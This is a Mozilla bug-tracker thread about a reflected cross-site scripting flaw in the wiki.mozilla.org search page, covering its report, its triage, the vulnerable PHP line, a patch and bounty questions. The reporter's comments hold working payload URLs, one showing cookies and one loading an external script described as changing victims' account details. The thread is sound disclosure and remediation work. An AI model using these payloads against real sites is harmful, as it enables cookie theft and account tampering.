Closed
Bug 714540
Opened 13 years ago
Closed 13 years ago
Cross site scripting(XSS) in https://wiki.mozilla.org
Categories
(Websites :: wiki.mozilla.org, defect)
Websites
wiki.mozilla.org
Tracking
(Not tracked)
VERIFIED
FIXED
People
(Reporter: netfuzzerr, Assigned: wenzel)
References
()
Details
(Keywords: wsec-xss, Whiteboard: [infrasec:xss][ws:high])
Attachments
(2 files)
User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Steps to reproduce: Hello, I found a vulnerability Cross Site Scripting in https://wiki.mozilla.org. The vulnerability results because the research is not correct encoding, thus allowing an attacker to attack Cross Site Scripting, and possibly pledging the account of the victim to visit a specially crafted link. Exploration for the attacker must convince the User logged in to visit the page with a link specially created exploiting this flaw and stealing the victim's cookies. Reproduce: 1. Log in https://wiki.mozilla.org. 2. Now, go to https://wiki.mozilla.org/Special:Search?search=sssssssssssssss%22%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&x=23&y=8 3. See your cookies. this vulnerability may be eligible for a reward? Regards, Mario
|
Reporter | |
Updated•13 years ago
|
Severity: normal → critical
|
||
Comment 1•13 years ago
|
||
Thank you for reporting this issue to us. We'll investigate the issue and provide feedback within the bug. No additional action is needed from you at this time. If you have questions or additional information please add that info to the bug. Thanks, mgoodwin
Status: UNCONFIRMED → NEW
Ever confirmed: true
|
|
||
Updated•13 years ago
|
Whiteboard: [infrasec:xss][ws:high]
|
|
Reporter | |
Comment 3•13 years ago
|
||
Only, for confirm a possible attack. I'm attaching a exploit for this vulnerability, he exploit the vulnerability and change user informations doing a CSRF attack. Reproduce: 1. Log in wiki.mozilla.org 2. Open this https://wiki.mozilla.org/Special:Search?search=%22%3E%3Cscript%20src=http://fuzzgooglecode.googlecode.com/files/xssexploit%282%29.js%3E%3C/script%3E 3. Wait... 4. See your account, changed.
|
|
Reporter | |
Comment 4•13 years ago
|
||
|
|
Reporter | |
Comment 5•13 years ago
|
||
I wonder if this vulnerability may be eligible for a reward?
|
|
Reporter | |
Updated•13 years ago
|
|
|
Reporter | |
Comment 6•13 years ago
|
||
It seems that Mozilla is ignoring this flaw, it's been two weeks, no correction, no response. No reason for this failure to keep private. Mozilla is forcing me to make this flaw public. You will not fix this flaw?
|
|
||
Comment 7•13 years ago
|
||
It seems the issue here is with the gmo skin.
The offending line is 353 of gmo.php:
echo " » <a href=\"$item_url\"> Search: " . $search_params['search'] . "</a>";
Any user supplied input should be correctly output encoded prior to being written. See https://wiki.mozilla.org/WebAppSec/Secure_Coding_Guidelines#Preventing_XSS for more info.Assignee: nobody → milos
|
||
Comment 9•13 years ago
|
||
(In reply to Mario Gomes from comment #5) > I wonder if this vulnerability may be eligible for a reward? Mario, this particular site is not on the bounty list and is not eligible for the bounty program. The list of sites that do qualify can be found here : http://www.mozilla.org/security/bug-bounty-faq-webapp.html#eligible-bugs However, we do still appreciate you filing this issue and we'll work to address it.
|
|
Reporter | |
Comment 10•13 years ago
|
||
In the post about bug bounty, Mozilla also said that will also pay for security bugs in websites not listed. But, seems the bug need be "ws:critical". This is right?
|
|
Reporter | |
Comment 11•13 years ago
|
||
in the post, Mozilla also said that will pay also for reports in not listed. But, seems only pay for bugs "ws:critical"?
|
|
||
Comment 12•13 years ago
|
||
(In reply to Mario Gomes from comment #11) > in the post, Mozilla also said that will pay also for reports in not listed. > But, seems only pay for bugs "ws:critical"? Correct, we sometimes pay bounties for exceptional security issues in other sites that were not listed within the bounty scope. WS:critical would be a minimum requirement, but would not guarantee a bounty payment. We would need to evaluate the specific issue on a case by case basis.
|
|
Reporter | |
Comment 13•13 years ago
|
||
Okay. I will try find it. Only a doubt, why Mozilla here https://wiki.mozilla.org/WebAppSec/Web_App_Severity_Ratings put CSRF more critical than XSS(reflected), if with a XSS I can do CSRF attacks(see comment 3). For exemple: the bug 620397. The CSRF can change the user informations, but if i have a XSS Reflected I can do this easy(bypassing the security tokens).
|
Assignee | |
Comment 14•13 years ago
|
||
This should fix the issue. Sadly, I don't have an instance of Mediawiki handy, so can someone try this out please?
Attachment #591185 -
Flags: review?(milos)
Attachment #591185 -
Flags: feedback?(nmaul)
|
||
Comment 15•13 years ago
|
||
Comment on attachment 591185 [details] [diff] [review] Possible patch Review of attachment 591185 [details] [diff] [review]: ----------------------------------------------------------------- Looks good, thanks Fred. Jake: please push this to prod, thanks.
Attachment #591185 -
Flags: review?(milos) → review+
|
|
Assignee | |
Comment 16•13 years ago
|
||
Landed: r100350. Will file a bug to get this pushed.
Assignee: milos → fwenzel
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
|
||
Updated•13 years ago
|
Attachment #591185 -
Flags: feedback?(nmaul) → feedback+
|
||
Comment 18•11 years ago
|
||
Adding keywords to bugs for metrics, no action required. Sorry about bugmail spam.
Keywords: wsec-xss
|
||
Updated•10 years ago
|
Group: websites-security
You need to log in
before you can comment on or make changes to this bug.
Description
•